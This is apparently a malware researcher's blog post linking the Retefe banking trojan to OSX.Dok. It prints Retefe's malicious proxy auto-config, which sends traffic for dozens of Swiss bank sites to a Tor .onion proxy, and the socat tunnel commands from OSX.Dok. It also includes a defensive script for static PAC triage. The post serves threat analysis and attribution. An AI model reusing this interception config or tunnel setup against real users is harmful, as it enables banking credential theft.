Retefe and OSX.DOK - One and the same?

A few vendors announced a malware family known as OSX.Dok, which targeted OSX using methods strikingly similar to those I had seen used by Retefe. Having observed some of Retefe's configuration changes recently, this seemed too similar to be a simple coincidence.

For those unfamiliar, Retefe is a banking trojan with numerous configurations, which usually target EU banks: the United Kingdom and France among them, but in my own experience the real targets have been Germany and Switzerland. This article last week identified Germany but included a Swiss screenshot by Checkpoint (linked here), which is slightly confusing.

The part of Retefe that struck me as similar is the proxy auto-configuration (PAC) .JS file, which the trojan uses to identify the range of banking sites it wants to intercept:

function FindProxyForURL(url, host) {
    var proxy = "PROXY paoyu7gub72lykuk.onion:88;";
    var hosts = new Array('*.postfinance.ch', 'cs.directnet.com', '*akb.ch',
        '*ubs.com', 'tb.raiffeisendirect.ch', '*bkb.ch', '*lukb.ch',
        '*zkb.ch', '*onba.ch', '*gkb.ch', '*bekb.ch', '*zugerkb.ch',
        '*bcge.ch', '*raiffeisen.ch', '*credit-suisse.com', '*.clientis.ch',
        'clientis.ch', '*bcvs.ch', '*.cic.ch', 'cic.ch', '*baloise.ch',
        'ukb.ch', '*.ukb.ch', 'urkb.ch', '*.urkb.ch', '*eek.ch', '*szkb.ch',
        '*shkb.ch', '*glkb.ch', '*nkb.ch', '*owkb.ch', '*cash.ch',
        '*bcf.ch', 'ebanking.raiffeisen.ch', '*bcv.ch', '*juliusbaer.com',
        '*abs.ch', '*bcn.ch', '*blkb.ch', '*bcj.ch', '*zuercherlandbank.ch',
        '*valiant.ch', '*wir.ch', '*bankthalwil.ch', '*piguetgalland.ch',
        '*triba.ch', '*inlinea.ch', '*bernerlandbank.ch',
        '*bancasempione.ch', '*bsibank.com', '*corneronline.ch',
        '*vermoegenszentrum.ch', '*gobanking.ch', '*slbucheggberg.ch',
        '*slfrutigen.ch', '*hypobank.ch', '*regiobank.ch', '*rbm.ch',
        '*hbl.ch', '*ersparniskasse.ch', '*ekr.ch',
        '*sparkasse-dielsdorf.ch', '*eki.ch', '*bankgantrisch.ch',
        '*bbobank.ch', '*alpharheintalbank.ch', '*aekbank.ch',
        '*acrevis.ch', '*credinvest.ch', '*bancazarattini.ch', '*appkb.ch',
        '*arabbank.ch', '*apbank.ch', '*notenstein-laroche.ch',
        '*bankbiz.ch', '*bankleerau.ch', '*btv3banken.ch', '*dcbank.ch',
        '*bordier.com', '*banquethaler.com', '*bankzimmerberg.ch',
        '*bbva.ch', '*bankhaus-jungholz.ch', '*sparhafen.ch',
        '*banquecramer.ch', '*banqueduleman.ch', '*bcpconnect.com',
        '*bil.com', '*vontobel.com', '*pbgate.net');
    for (var i = 0; i < hosts.length; i++) {
        if (shExpMatch(host, hosts[i])) {
            return proxy
        }
    }
    return "DIRECT"
}

Compare this with the OSX version, whose LaunchAgents run the following socat commands:

/usr/local/bin/socat tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:paoyu7gub72lykuk.onion:80,socksport=9050

/usr/local/bin/socat tcp4-LISTEN:5588,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:paoyu7gub72lykuk.onion:5588,socksport=9050

You'll note the .onion site in question is present both in this configuration and in the article discussed above. Additionally, the similarities continue:
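As an added example (not code from the original post or from either malware), the following script performs the static triage a defender would do on a PAC file like the one above: it pulls out the PROXY directives and host patterns without executing the untrusted JavaScript, flags proxies that point at .onion names, and uses a PAC-compatible shExpMatch to show which sample hostnames would be routed through the proxy. The embedded PAC text is constructed to mirror the structure above, with a placeholder .onion name.

```javascript
// Constructed sample PAC with the same shape as the one discussed above.
// The .onion name is a placeholder, not an observed indicator.
const SAMPLE_PAC = `
function FindProxyForURL(url, host) {
    var proxy = "PROXY placeholder-onion-host.onion:88;";
    var hosts = new Array('*.postfinance.ch', 'cs.directnet.com', '*ubs.com');
    for (var i = 0; i < hosts.length; i++) {
        if (shExpMatch(host, hosts[i])) {
            return proxy
        }
    }
    return "DIRECT"
}`;

// PAC shExpMatch semantics: shell-style glob, '*' matches any run, '?' one char.
function shExpMatch(str, pattern) {
  const re = '^' + pattern.replace(/[.+^${}()|[\]\\]/g, '\\$&')
                          .replace(/\*/g, '.*')
                          .replace(/\?/g, '.') + '$';
  return new RegExp(re, 'i').test(str);
}

// Extract PROXY directives textually; the PAC is untrusted code, so never eval it.
function extractProxies(pacSource) {
  const out = [];
  const re = /PROXY\s+([^\s;"']+)/g;
  let m;
  while ((m = re.exec(pacSource)) !== null) out.push(m[1]);
  return out;
}

// Extract the quoted host patterns from the hosts array literal.
function extractHostPatterns(pacSource) {
  const m = /new Array\(([\s\S]*?)\)/.exec(pacSource);
  if (!m) return [];
  return Array.from(m[1].matchAll(/'([^']+)'/g), x => x[1]);
}

// Report which proxies look like Tor hidden services and which sample hosts
// would be intercepted (i.e. not returned as DIRECT).
function triagePac(pacSource, sampleHosts) {
  const proxies = extractProxies(pacSource);
  const patterns = extractHostPatterns(pacSource);
  const onionProxies = proxies.filter(p => /\.onion(:\d+)?$/i.test(p));
  const intercepted = sampleHosts.filter(h => patterns.some(p => shExpMatch(h, p)));
  return { proxies, onionProxies, patternCount: patterns.length, intercepted };
}

console.log(JSON.stringify(triagePac(SAMPLE_PAC,
  ['e-banking.postfinance.ch', 'www.ubs.com', 'example.com']), null, 2));
```

Because the matching is done with our own shExpMatch rather than by running the PAC, the script stays safe to point at a file pulled from an infected host.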

Retefe                   OSX/Dok
Root Certificate         Root Certificate
Proxy hijacking          Proxy hijacking
paoyu7gub72lykuk.onion   paoyu7gub72lykuk.onion

Banking trojans have been at the forefront of the media for a while, and the revenue they generate is clearly attractive to criminals and draws the attention of law enforcement, as demonstrated recently both here and here.